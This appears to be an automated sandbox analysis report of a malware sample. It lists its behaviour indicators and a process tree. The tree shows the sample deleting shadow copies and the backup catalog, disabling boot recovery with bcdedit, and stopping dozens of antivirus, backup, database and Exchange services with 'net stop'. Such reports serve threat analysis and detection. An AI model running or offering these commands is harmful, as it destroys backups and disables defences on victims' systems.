2548 WMIC.exe Token: SeSecurityPrivilege 2548 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 620 wrote to memory of 1728 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 31 PID 620 wrote to memory of 1728 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 31 PID 620 wrote to memory of 1728 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 31 PID 620 wrote to memory of 1728 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 31 PID 1728 wrote to memory of 932 1728 cmd.exe 33 PID 1728 wrote to memory of 932 1728 cmd.exe 33 PID 1728 wrote to memory of 932 1728 cmd.exe 33 PID 1728 wrote to memory of 932 1728 cmd.exe 33 PID 620 wrote to memory of 1560 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 34 PID 620 wrote to memory of 1560 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 34 PID 620 wrote to memory of 1560 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 34 PID 620 wrote to memory of 1560 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 34 PID 620 wrote to memory of 2028 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 36 PID 620 wrote to memory of 2028 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 36 PID 620 wrote to memory of 2028 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 36 PID 620 wrote to memory of 2028 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 36 PID 2028 wrote to memory of 1888 2028 cmd.exe 38 PID 2028 wrote to memory of 1888 2028 cmd.exe 38 PID 2028 wrote to memory of 1888 2028 cmd.exe 38 PID 2028 wrote to memory of 1888 2028 cmd.exe 38 PID 2028 wrote to memory of 1568 2028 cmd.exe 39 PID 2028 wrote to memory of 1568 2028 cmd.exe 39 PID 2028 wrote to memory of 1568 2028 cmd.exe 39 PID 2028 wrote to memory of 1568 2028 cmd.exe 39 PID 620 wrote to memory of 680 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 41 PID 620 wrote to memory of 680 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 41 PID 620 wrote to memory of 680 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 41 PID 620 wrote to memory of 680 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 41 PID 620 wrote to memory of 1580 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 43 PID 620 wrote to memory of 1580 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 43 PID 620 wrote to memory of 1580 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 43 PID 620 wrote to memory of 1580 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 43 PID 620 wrote to memory of 1056 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 45 PID 620 wrote to memory of 1056 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 45 PID 620 wrote to memory of 1056 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 45 PID 620 wrote to memory of 1056 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 45 PID 620 wrote to memory of 828 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 47 PID 620 wrote to memory of 828 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 47 PID 620 wrote to memory of 828 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 47 PID 620 wrote to memory of 828 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 47 PID 620 wrote to memory of 1200 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 48 PID 620 wrote to memory of 1200 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 48 PID 620 wrote to memory of 1200 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 48 PID 620 wrote to memory of 1200 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 48 PID 620 wrote to memory of 1260 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 50 PID 620 wrote to memory of 1260 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 50 PID 620 wrote to memory of 1260 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 50 PID 620 wrote to memory of 1260 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 50 PID 620 wrote to memory of 1844 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 51 PID 620 wrote to memory of 1844 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 51 PID 620 wrote to memory of 1844 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 51 PID 620 wrote to memory of 1844 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 51 PID 620 wrote to memory of 1756 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 53 PID 620 wrote to memory of 1756 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 53 PID 620 wrote to memory of 1756 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 53 PID 620 wrote to memory of 1756 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 53 PID 1200 wrote to memory of 1432 1200 net.exe 55 PID 1200 wrote to memory of 1432 1200 net.exe 55 PID 1200 wrote to memory of 1432 1200 net.exe 55 PID 1200 wrote to memory of 1432 1200 net.exe 55 PID 828 wrote to memory of 276 828 net.exe 54 PID 828 wrote to memory of 276 828 net.exe 54 PID 828 wrote to memory of 276 828 net.exe 54 PID 828 wrote to memory of 276 828 net.exe 54
Processes
-
C:\Users\Admin\AppData\Local\Temp\a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe"C:\Users\Admin\AppData\Local\Temp\a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Drops startup file
- Loads dropped DLL
- Windows security modification
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C sc delete VSS2⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\sc.exesc delete VSS3⤵
- Launches sc.exe
PID:932
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet2⤵PID:1560
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1888
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no2⤵PID:680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵PID:1056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:1880
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:276
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:1432
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:1260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:1236
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:1844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:1888
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵PID:1756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:900
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:1828
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:1432
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:1684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:728
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" top SavRoam /y2⤵PID:848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 top SavRoam /y3⤵PID:544
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵PID:956
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:1552
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:1972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:908
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:1344
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵PID:276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:1072
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:1016
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:544
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵PID:1132
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:1264
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:1556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:1600
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:1540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:1780
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:1564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:1264
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:1344
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:1592
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:2072
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:1820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:852
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:1616
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:2112
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:1880
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:2212
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:1748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:2144
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:2220
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:1596
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:2304
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:1648
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:2264
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:1976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:2252
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:1016
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:2408
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:2400
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:1432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:2416
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:604
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:2452
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:1436
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:2496
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:2052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:2528
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵PID:2084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:2536
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop -n apache242⤵PID:2104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop -n apache243⤵PID:2652
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" DefWatch2⤵PID:2160
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 DefWatch3⤵PID:2692
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:2184
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:2544
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:2168
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:2516
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵PID:2192
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:2760
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" wrapper2⤵PID:2152
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 wrapper3⤵PID:2592
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mysql572⤵PID:2128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mysql573⤵PID:2644
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Sqlservr /y2⤵PID:2272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sqlservr /y3⤵PID:2784
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sqladhlp /y2⤵PID:2288
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sqladhlp /y3⤵PID:2876
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sqlagent /y2⤵PID:2280
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sqlagent /y3⤵PID:2792
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Culserver /y2⤵PID:2296
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Culserver /y3⤵PID:2908
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵PID:2312
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:2892
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sqlbrowser /y2⤵PID:2320
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sqlbrowser /y3⤵PID:2928
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QLADHLP /y2⤵PID:2336
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QLADHLP /y3⤵PID:2920
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:2392
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:2944
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QuickBooks /y2⤵PID:2436
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooks /y3⤵PID:2372
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit /y2⤵PID:2428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit /y3⤵PID:2936
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FCS /y2⤵PID:2584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FCS /y3⤵PID:2468
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:2684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:2356
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vmware /y2⤵PID:2700
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vmware /y3⤵PID:544
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vmware-converter /y2⤵PID:2708
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vmware-converter /y3⤵PID:2388
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop dbeng8 /y2⤵PID:2724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop dbeng8 /y3⤵PID:852
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop dbsrv12 /y2⤵PID:2716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop dbsrv12 /y3⤵PID:2332
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tomcat6 /y2⤵PID:2676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tomcat6 /y3⤵PID:2076
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msmdsrv /y2⤵PID:2668
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmdsrv /y3⤵PID:2072
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:2608
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:2068
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$MICROSOFT /y2⤵PID:2732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$MICROSOFT /y3⤵PID:1472
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ##WID /y2⤵PID:2740
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ##WID /y3⤵PID:2180
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:2748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵PID:1780
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:2768
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵PID:1804
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y2⤵PID:2776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵PID:1084
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y2⤵PID:2800
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵PID:2224
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FishbowlMySQL /y2⤵PID:2492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FishbowlMySQL /y3⤵PID:2604
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$MICROSOFT /y2⤵PID:2556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$MICROSOFT /y3⤵PID:2200
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$KAV_CS_ADMIN_KIT /y2⤵PID:1236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$KAV_CS_ADMIN_KIT /y3⤵PID:2328
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y2⤵PID:1116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵PID:2664
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵PID:2136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵PID:2480
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$KAV_CS_ADMIN_KIT /y2⤵PID:2308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$KAV_CS_ADMIN_KIT /y3⤵PID:3012
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql /y2⤵PID:1660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql /y3⤵PID:2156
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Exchange /y2⤵PID:2244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Exchange /y3⤵PID:2504
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$MICROSOFT##SSEE /y2⤵PID:2816
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$MICROSOFT##SSEE /y3⤵PID:2524
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:2400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵PID:2652
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:2408
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵PID:2632
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sql /y2⤵PID:2276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sql /y3⤵PID:852
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vss /y2⤵PID:2784
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vss /y3⤵PID:2820
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵PID:2552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:2476
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵PID:2620
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:2996
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBVSS /y2⤵PID:2088
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS /y3⤵PID:2828
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:2172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:2640
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:1568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵PID:2600
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:2452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵PID:2976
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:2520
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:2444
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:2236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:2984
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵PID:2112
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:2448
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mepocs /y2⤵PID:2960
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mepocs /y3⤵PID:1072
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop memtas /y2⤵PID:2588
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop memtas /y3⤵PID:2432
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ /y2⤵PID:2972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ /y3⤵PID:2936
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL /y2⤵PID:2964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL /y3⤵PID:2920
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svc$ /y2⤵PID:2812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svc$ /y3⤵PID:2888
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop backup /y2⤵PID:544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop backup /y3⤵PID:2624
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y2⤵PID:2712
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:3060
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:2844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:2416
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:2156
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:3032
-
